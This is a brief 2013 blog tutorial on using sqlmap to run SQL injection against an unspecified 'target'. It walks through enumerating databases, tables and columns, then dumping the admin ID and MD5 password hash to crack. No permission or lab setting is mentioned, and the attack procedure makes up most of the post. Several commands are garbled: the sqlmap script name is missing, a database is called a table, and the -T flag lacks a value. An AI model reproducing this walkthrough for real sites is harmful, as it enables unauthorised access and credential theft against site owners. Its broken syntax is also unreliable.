Monday, December 30, 2013

SQL Injection with SQLmap

Today my tutorial is on hacking a SQL database using SQLmap. so the first step would be to write this cd/pentest/web/scanners/sqlmap then hit enter. Then write this except put your targets name in the targets name section. type this to find the databases python -u (targets name here) --dbs then hit enter
then you should select a database then you can type this python - u (targets address) -D (the table you selected) --tables then hit enter.
then you will see the tables displayed if you have done this correctly.
now find the column by typing this: python - u (targets address) -D (the table you selected) -T --columns
this is the last step type this: python - u (targets address) -D (the table you selected) -C (column name) --dump then hit enter
then it will ask you yes or no  and you put y and enter then you just wait and it will have the Admin ID name and the password encrypted in md5 hash were you have to decrypt it.
hope this was useful please visit subscribe enjoy.

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